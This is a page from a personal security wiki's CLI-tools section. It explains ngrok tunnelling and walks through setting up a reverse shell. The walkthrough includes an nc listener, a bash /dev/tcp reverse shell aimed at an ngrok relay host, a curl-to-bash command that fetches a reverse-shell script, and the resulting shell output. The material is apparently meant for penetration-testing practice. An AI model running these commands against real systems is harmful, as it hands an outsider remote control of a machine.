Tech with Tyler
LinkedInGitHubYouTube
  • 👋Welcome!
    • whoami
    • !!! Disclaimer !!!
  • 🎓Academy
    • AWS Security Cookbook
      • AWS Control Tower
        • Lab: Deploying AWS Control Tower via Terraform
        • Lab: Blocking Regions with AWS Control Tower
      • AWS CloudTrail
      • AWS GuardDuty
        • Lab: Deploying AWS GuardDuty via Terraform
        • Lab: Logging GuardDuty Findings to S3
        • Lab: Adversary Simulation Detection with Stratus Red Team and GuardDuty
      • AWS Organizations
        • Lab: Deploying AWS Organizations via Terraform
      • AWS Root Account Management
        • Lab: Deploying AWS Root Account Management via Terraform
      • AWS Service Control Policies (SCPs)
        • Lab: Deploying AWS Service Control Policies (SCPs) via Terraform
      • TBD - Coming Soon!
        • [TBD] AWS Account Factory
        • [TBD] AWS Identity Center
    • My content on Cybr
      • Course - Terraform on AWS: From Zero to Cloud Infrastructure
      • Lab - Create Static AWS S3 Website with Terraform
      • Lab - Secure EC2 Access with SSM Session Manager and KMS
      • Lab - Encrypt and Decrypt Data with KMS and Data Encryption Keys
    • My content on PwnedLabs
      • Cyber Range - Electra
      • Lab - Abusing Identity Providers in AWS
      • Lab - Prowler and AWS Security Hub
      • Blog - Abusing Identity Providers in AWS
      • Blog - Building Security Guardrails with AWS Resource Control Policies
      • Blog - Defending Against the whoAMI Attack with AWS Declarative Policies
    • My content on YouTube
      • AWS Security Engineering
      • Linux in 60 Seconds!
  • ☁️Cloud Security
    • AWS Attacks and Techniques
      • Enumerate AWS Account IDs
      • Enumerate AWS IAM Users
      • Enumerate (Unauthenticated) IAM Users and Roles
      • Enumerate AWS Public Resources
      • Enumerate Secrets in AWS
      • Generate AWS Console Session
      • Generate IAM Access Keys from CloudShell
      • Password Spraying AWS IAM Users
      • Subdomain Takeovers
    • AWS Privilege Escalation
      • Identity Access Management (IAM)
      • IAM Trust Policies
      • Key Management Service (KMS)
      • Lightsail
      • OpenID Connect (OIDC)
      • S3
      • Secrets Manager
      • Security Token Service (STS)
    • AWS General Info
      • Amazon Bedrock
      • EC2
      • KMS
      • S3
      • SNS Topic
    • AWS CLI Cheat Sheet
    • Capture the Flags (CTFs)
      • Flaws.Cloud
        • Level 1
        • Level 2
        • Level 3
        • Level 4
        • Level 5
        • Level 6
      • PwnedLabs
        • Escalate Privileges by IAM Policy Rollback
        • Exploiting Weak S3 Bucket Policies
        • Leveraging S3 Bucket Versioning
        • S3 Enumeration Basics
        • Pillage Exposed RDS Instances
        • EC2 SSRF Attack
        • Hunt for Secrets in Git Repos
      • Cybr
        • Challenge - Secrets Unleashed
    • Tools
      • Tooling Index
      • dsnap
      • Pacu
      • s3-account-search
      • GoAWSConsoleSpray
      • aws_consoler
      • cloudenum
  • 📦Containers & Orchestration
    • Kubernetes
  • 👨‍💻Coding & CLI Tooling
    • CLI Tools
      • AWS CLI
      • Git
      • GitHub Copilot (CLI)
      • Homebrew
      • jq
      • ngrok
      • ssh
    • Coding and Scripting
      • Bash
      • Python
    • Terminal Customization
  • ⚙️DevSecOps
    • CI/CD
      • GitLab
    • Hashicorp Terraform
    • Hashicorp Vault
    • IAC Scanning
      • tfsec
    • Secrets Scanning
      • Trufflehog
  • 🎁Miscellaneous
    • Jenkins
  • 💻Operating Systems
    • Linux
      • APT Package Manager
      • CLI Tools Cheat Sheet
      • Man Pages
      • Services
      • Users and Groups
  • 🏗️Projects
    • Active Directory Homelab Automation
    • AWS Cloud Resume Challenge
    • Proxmox Homelab as Code
  • 📌Other
    • Useful Resources
Powered by GitBook
On this page
  • Overview
  • Registration
  • Example - Reverse Shell
  • Ngrok and local listener setup
  • Reverse shell setup and execution

Was this helpful?

  1. Coding & CLI Tooling
  2. CLI Tools

ngrok

Ngrok overview and setting up reverse shells

PreviousjqNextssh

Last updated 6 months ago

Was this helpful?

Overview

  • is a pretty sweet solution for a secure ingress gateway for your apps, services, and APIs. Check to see its use cases

  • With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL

  • There are methods to build authentication or allowlisting around this but they're not part of the free tier

Registration

  • After signing up for a free ngrok account, follow the to get ngrok set up on your machine


Example - Reverse Shell

Ngrok and local listener setup

  • On your machine run a command to capture TCP traffic

ngrok tcp 1337
  • This will provide you with a free forwarding address (you can also set up a custom domain)

ngrok                                                                                                                
                                                                                                                                     
Policy Management Examples http://ngrok.com/apigwexamples                                                                            
                                                                                                                                     
Session Status                online                                                                                                 
Account                       cal (Plan: Free)                                                                                       
Version                       3.18.2                                                                                                 
Region                        United States (California) (us-cal-1)                                                                  
Web Interface                 http://127.0.0.1:4040                                                                                  
Forwarding                    tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337                                                  
                                                                                                                                     
Connections                   ttl     opn     rt1     rt5     p50     p90                                                            
                              0       0       0.00    0.00    0.00    0.00
  • You will need a way to catch incoming connections, we can use nc for this like so:

nc -nvlp 1337

Reverse shell setup and execution

  • On a different machine, execute a reverse shell and the traffic should be sent to your machine

bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'
  • Tip - If you're running a bash reverse shell, ensure the current shell is bash, or you'll get an error like the one below. Otherwise, you can specifically call on bash using the command above from any shell so long as bash is installed

zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412
  • You can go to this URL directly in your browser and see the script that would execute

curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash
  • Once the shell has successfully executed, you should see it in your listener e.g., nc

nc -nvlp 1337

listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

bash-3.2$ whoami
tyler

bash-3.2$ hostname
TylerMBP.local

bash-3.2$  

Check out and for additional reverse shell options

Another option is to use which acts as a reverse shell as a service

👨‍💻
ngrok
the docs
setup instructions
pentestmonkey
revshells
reverse-shell.sh